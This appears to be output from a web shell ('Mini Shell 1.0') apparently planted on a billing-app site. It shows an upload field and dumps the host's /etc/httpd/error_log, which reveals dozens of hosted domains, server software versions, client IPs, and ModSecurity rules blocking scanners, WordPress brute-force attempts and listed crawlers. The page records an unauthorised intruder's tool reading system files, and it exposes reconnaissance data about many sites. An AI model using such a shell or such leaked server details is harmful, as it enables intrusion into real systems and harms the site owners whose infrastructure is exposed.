HOME


Mini Shell 1.0
Mosykay Billing App
Logo
Login
DIR: /etc/httpd/
Upload File :
Current File : //etc/httpd/error_log
[Tue May 26 12:43:40.888935 2026] [lsapi:notice] [pid 333123:tid 333123] mod_lsapi:  version 1.1-92
[Tue May 26 12:43:40.891583 2026] [:notice] [pid 448910:tid 448910] [host root@md-74.webhostbox.net] mod_lsapi:  Selfstarter 448910 started
[Tue May 26 12:43:40.909314 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: earthone.me.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.921299 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: arborvitae.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.921903 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cargo-pulse.info.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.929872 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: vobre.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.941994 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dezkapro.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.942300 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: bld4u.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.942643 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: eco-green.com.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.945808 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.946148 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 1earth.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.946744 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: wildcatc.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947013 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947554 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: parjanya.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947867 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopykaapi.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948163 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopycoffee.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948427 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarinienergy.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948994 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: hassantourism.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.949264 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rohiniventures.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.949705 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: adishankara.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.950291 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: actindiamovement.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.952444 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.952790 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: directi.con:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.953056 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: carpetlive.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.954021 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.973636 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubbanquet.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.973955 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubmembership.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.978478 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rbi-cin.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.979361 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: jbrainit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.979693 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: phpridles.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.980540 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: updates9ja.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.980902 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: lookqueenny.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.981219 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 9jareporter.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.981484 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: joshchibuzor.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982153 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chyamsempire.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982484 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: builderscorner.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982899 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: industrialvacumunit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.983198 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chukwuebukafreestyle.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.983558 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ecolinksglobalexpressdelivery.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.984454 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cwh.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.984823 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: senoro.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985141 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: crystalclear.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985459 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurante.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985762 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciagutierrez.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.986064 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurantecom.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.986334 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: autopartesenguadalajara.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.987215 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dprassurance.lk.dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.989231 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: thriveswift.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.989520 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: gauravchhabradigital.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.991321 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciaitconsultores.com.bandita-data.net:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.995854 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: mtm117.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996143 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: makwasi.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996402 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: baka-bau.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996680 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: alpha-bau.net.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996945 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: t9-security.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.997196 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: north-connect.de.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.002993 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: pdrwebsolutions.cloud:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.009800 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.014054 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: myigfollowers.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.024673 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: localhost:8443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.029956 2026] [qos:notice] [pid 333123:tid 333123] mod_qos(007): calculated MaxClients/MaxRequestWorkers (max connections): 6144, applied limit: 2048 (QS_MaxClients)
[Tue May 26 12:43:41.098655 2026] [http2:info] [pid 333123:tid 333123] AH03090: mod_http2 (v2.0.39, feats=CHPRIO+SHA256+INVHD+DWINS, nghttp2 1.69.0), initializing...
[ N 2026-05-26 12:43:41.1201 448915/T1 age/Wat/WatchdogMain.cpp:1377 ]: Starting Passenger watchdog...
[ N 2026-05-26 12:43:41.1322 448918/T1 age/Cor/CoreMain.cpp:1340 ]: Starting Passenger core...
[ N 2026-05-26 12:43:41.1324 448918/T1 age/Cor/CoreMain.cpp:256 ]: Passenger core running in multi-application mode.
[ N 2026-05-26 12:43:41.1515 448918/T1 age/Cor/CoreMain.cpp:1015 ]: Passenger core online, PID 448918
[Tue May 26 12:43:41.154095 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00489: Apache/2.4.67 (cPanel) OpenSSL/1.1.1w Apache mod_qos/11.76 mod_bwlimited/1.4 mod_fcgid/2.3.9 Phusion_Passenger/6.0.20 mod_rbld2.0 configured -- resuming normal operations
[Tue May 26 12:43:41.154118 2026] [core:notice] [pid 333123:tid 333123] AH00094: Command line: '/usr/sbin/httpd'
[Tue May 26 12:43:42.173786 2026] [http2:info] [pid 448967:tid 448967] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:43:42.426990 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/index/function.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQLQAAAA0"]
[Tue May 26 12:43:43.778824 2026] [security2:error] [pid 448967:tid 449214] [client 85.208.96.200:59498] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVIJ-XLPuWQsfM-UVSQRgAAAHU"]
[Tue May 26 12:43:43.778958 2026] [security2:error] [pid 448967:tid 449214] [client 85.208.96.200:59498] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVIJ-XLPuWQsfM-UVSQRgAAAHU"]
[Tue May 26 12:43:44.746592 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQJQAAAB8"]
[Tue May 26 12:43:44.752546 2026] [security2:error] [pid 448967:tid 449206] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJ-XLPuWQsfM-UVSQTAAAAG0"]
[Tue May 26 12:43:44.752938 2026] [security2:error] [pid 448967:tid 449126] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQIwAAAB0"]
[Tue May 26 12:43:44.758280 2026] [security2:error] [pid 448967:tid 449138] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQLAAAACk"]
[Tue May 26 12:43:44.874831 2026] [security2:error] [pid 448967:tid 449134] [client 157.20.138.61:54725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIKOXLPuWQsfM-UVSQYAAAACU"]
[Tue May 26 12:43:44.874970 2026] [security2:error] [pid 448967:tid 449134] [client 157.20.138.61:54725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIKOXLPuWQsfM-UVSQYAAAACU"]
[Tue May 26 12:43:45.627345 2026] [security2:error] [pid 448967:tid 449115] [client 4.201.75.230:5896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/ws.php"] [unique_id "ahVIKeXLPuWQsfM-UVSQfAAAABI"]
[Tue May 26 12:43:47.466795 2026] [security2:error] [pid 448967:tid 449224] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIK-XLPuWQsfM-UVSQrgAAAH8"]
[Tue May 26 12:43:49.627937 2026] [autoindex:error] [pid 448967:tid 449097] [client 43.157.149.188:56282] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:43:50.494646 2026] [security2:error] [pid 448967:tid 449129] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVILuXLPuWQsfM-UVSRCAAAACA"]
[Tue May 26 12:43:52.717532 2026] [security2:error] [pid 448967:tid 449190] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIMOXLPuWQsfM-UVSRNgAAAF0"]
[Tue May 26 12:43:53.327859 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/404.php"] [unique_id "ahVIMeXLPuWQsfM-UVSRSwAAAA0"]
[Tue May 26 12:43:55.587248 2026] [security2:error] [pid 448967:tid 449152] [client 157.20.138.61:55073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRbAAAADc"]
[Tue May 26 12:43:55.587489 2026] [security2:error] [pid 448967:tid 449152] [client 157.20.138.61:55073] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRbAAAADc"]
[Tue May 26 12:43:56.157038 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRcgAAACs"]
[Tue May 26 12:43:58.563599 2026] [security2:error] [pid 448967:tid 449186] [client 113.164.207.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRmAAAAFk"]
[Tue May 26 12:43:58.935709 2026] [security2:error] [pid 448967:tid 449111] [client 4.201.75.230:5636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRpwAAAA4"]
[Tue May 26 12:43:59.245046 2026] [security2:error] [pid 448967:tid 449224] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRoQAAAH8"]
[Tue May 26 12:43:59.686842 2026] [security2:error] [pid 448967:tid 449020] [remote 103.145.62.145:41175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVIN-XLPuWQsfM-UVSRsAAACjQ"]
[Tue May 26 12:44:00.370423 2026] [security2:error] [pid 448967:tid 449187] [client 4.201.75.230:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-conf.php"] [unique_id "ahVIOOXLPuWQsfM-UVSRtwAAAFo"]
[Tue May 26 12:44:01.936411 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIOeXLPuWQsfM-UVSRzAAAAH4"]
[Tue May 26 12:44:02.263817 2026] [security2:error] [pid 448967:tid 449031] [remote 211.23.68.235:28758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVIOuXLPuWQsfM-UVSR1AAAbj8"]
[Tue May 26 12:44:04.922837 2026] [security2:error] [pid 448967:tid 449180] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIPOXLPuWQsfM-UVSR9QAAAFM"]
[Tue May 26 12:44:05.615205 2026] [security2:error] [pid 448967:tid 449131] [client 4.201.75.230:5670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-login.php"] [unique_id "ahVIPeXLPuWQsfM-UVSSBwAAACI"]
[Tue May 26 12:44:06.010058 2026] [security2:error] [pid 448967:tid 449156] [client 157.20.138.61:55422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSDwAAADs"]
[Tue May 26 12:44:06.010189 2026] [security2:error] [pid 448967:tid 449156] [client 157.20.138.61:55422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSDwAAADs"]
[Tue May 26 12:44:07.237406 2026] [security2:error] [pid 448967:tid 449219] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSHQAAAHo"]
[Tue May 26 12:44:07.529597 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/abc.php"] [unique_id "ahVIP-XLPuWQsfM-UVSSJQAAAA0"]
[Tue May 26 12:44:10.600674 2026] [security2:error] [pid 448967:tid 449203] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIQuXLPuWQsfM-UVSSUgAAAGo"]
[Tue May 26 12:44:12.921282 2026] [security2:error] [pid 448967:tid 449106] [client 4.201.75.230:5632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/abcd.php"] [unique_id "ahVIROXLPuWQsfM-UVSSgwAAAAk"]
[Tue May 26 12:44:13.515639 2026] [security2:error] [pid 448967:tid 449196] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIReXLPuWQsfM-UVSSjAAAAGM"]
[Tue May 26 12:44:14.562644 2026] [security2:error] [pid 448967:tid 449193] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIRuXLPuWQsfM-UVSSrgAAAGA"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1203509&moderation-hash=30ff998383af377c781773c90331cda3
[Tue May 26 12:44:16.485676 2026] [security2:error] [pid 448967:tid 449105] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVISOXLPuWQsfM-UVSSwwAAAAg"]
[Tue May 26 12:44:16.641538 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:55774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVISOXLPuWQsfM-UVSS1AAAAEY"]
[Tue May 26 12:44:16.641655 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:55774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVISOXLPuWQsfM-UVSS1AAAAEY"]
[Tue May 26 12:44:17.373214 2026] [security2:error] [pid 448967:tid 449214] [client 74.7.175.179:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "nicmaperu.com"] [uri "/index.php"] [unique_id "ahVIRuXLPuWQsfM-UVSSowAAAHU"]
